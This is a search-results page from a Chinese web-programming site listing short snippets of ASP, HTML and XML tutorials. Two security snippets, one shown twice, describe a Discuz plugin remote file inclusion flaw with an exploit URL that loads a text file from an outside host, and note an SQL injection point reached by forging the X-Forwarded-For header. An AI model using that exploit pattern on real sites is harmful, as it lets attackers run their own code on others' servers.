搜索列表
-
网上考试设计思路是怎样的?
【编程10000问】global.asa < script LANGUAGE=VBScript RUNAT=Server >Sub Application_OnStart dbPath = "DBQ=" & Server.Mappath("onlinetest.mdb") dbConnectionString = "DRIVER={Microsoft Access Driver (*.mdb)}; " & dbPath ...
|网上|上考|考试|试设|设计|计思|思路|路是|是怎|怎样|样的|的?|?| -
asp下载防盗链代码
【ASP编程】asp下载防盗链代码第一种: 终于对下载系统做了个防盗链措施,在下载的页面头部做了如下代码,相关代码如下: 复制代码 代码如下:<% From_url = Cstr(Request.ServerVariables("HTTP_REFERER")) Serv_url = Cstr(Request.Se...
asp下载防盗链代码 -
为什么有的留言簿不需要数据库?
【编程10000问】< html>< body>< form action="manage.asp" method="post">< input type="text" size="10" name="username">< input type="text" size="10" name="homepage">< input type="text" size="10" name="Email">< /form>< /body>< /html>&nbs...
|为什|什么|么有|有的|的留|留言|言簿|簿不|不需|需要|要数|数据|据库|库?|?| -
如何防范利用刷新来“作弊”的计数器?
【编程10000问】如何防范利用刷新来“作弊”的计数器?<%If IsEmpty(Session("Connected")) Then Application.Lock Application("counter") = Application("counter") + 1 Application.UnLockEnd If Session("Connected") = True%><html><body BGCO...
|如何|何防|防范|范利|利用|用刷|刷新|新来|来作|作弊|弊的|的计|计数|数器|器?|?| -
动态更改网页HTML元素(对象)内容
【CSS/HTML】动态HTML的出现为用户提供了一种基于传统标准HTML来创建交互式页面的机制。本文主要针对IE 5.0谈谈如何通过其提供的HTML文档对象(DOM)模型使用脚本添加、删除、修改页面中的HTML元素(对象)及元素(对象)内容。 动态更改网页HTML元素(对象)内容 HTML块级元素(对象)提供的4个可读写属性innerH...
动态更改网页HTML元素(对象)内容 -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
风讯4.0未公开Bug
【安全相关】补充一句,这个东西只是看代码时随便看到的一处,其他地方还多着呢,当时写下来还没测试,我就记了下来,其中有什么不对,还望理解。哈哈~ 前段时间网上流行的SQL注入是利用伪造代理IP来实施攻击,这个HTTP_X_FORWARDED_FOR在一段时间内倍受人们关注,今天在看风讯4.0 的时候也发现这样一个注入点,...
风讯4.0未公开Bug -
XML入门问答
【XML/RSS】什么是置标语言? ---------------------- 我们日常书写的语言,被称为书面自然语言。如果在书面自然语言中为了标识某些信息,而加入一些标记,这种书面自然语言就可被称为置标语言(英语为:Markup Language)。比如在一段书面语言中,为了说明某一句话的重要,在这句话下面画上底划线。但是,我们在这里解释的置标语言,...
XML入门问答 -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
MusicGet 类
【ASP编程】复制代码 代码如下:<% Response.Expires = 0 Response.expiresabsolute = Now() - 1 Response.addHeader "pragma", "no-cache" Response.addHeader "cache-control", "private" Respons...
MusicGet类 -
构建免受 FSO 威胁虚拟主机(一)
【ASP编程】现在绝大多数的虚拟主机都禁用了 ASP 的标准组件:FileSystemObject,因为这个组件为 ASP 提供了强大的文件系统访问能力,可以对服务器硬盘上的任何文件进行读、写、复制、删除、改名等操作(当然,这是指在使用默认设置的 Windows NT / 2000 下才能做到)。但是禁止此组件后,引起的后果就是所有利用这个组件的 ...
|构建|建免|免受|受F|FS|SO|O威|威胁|胁虚|虚拟|拟主|主机|机(|(一|一)|)| -
巧用FileSystem组件实现WEB应用中的本地特定打印
【ASP编程】1、引言 随着Internet的飞速发展,许多企业都纷纷开发基于WEB的业务应用系统。一般情况下,基于WEB的业务应用都采用三层或三层以上的结构,前台即客户端是普通的WEB浏览器,中间业务逻辑应用层存放于WEB服务器上,由WEB服务器上的服务构件访问后台数据库。为了业务系统与Internet的互联,WEB服务器和数据库系...
|巧用|用F|Fi|il|le|eS|Sy|ys|st|te|em|m组|组件|件实|实现|现W|WE|EB|B应|应用|用中|中的|的本|本地|地特|特定|定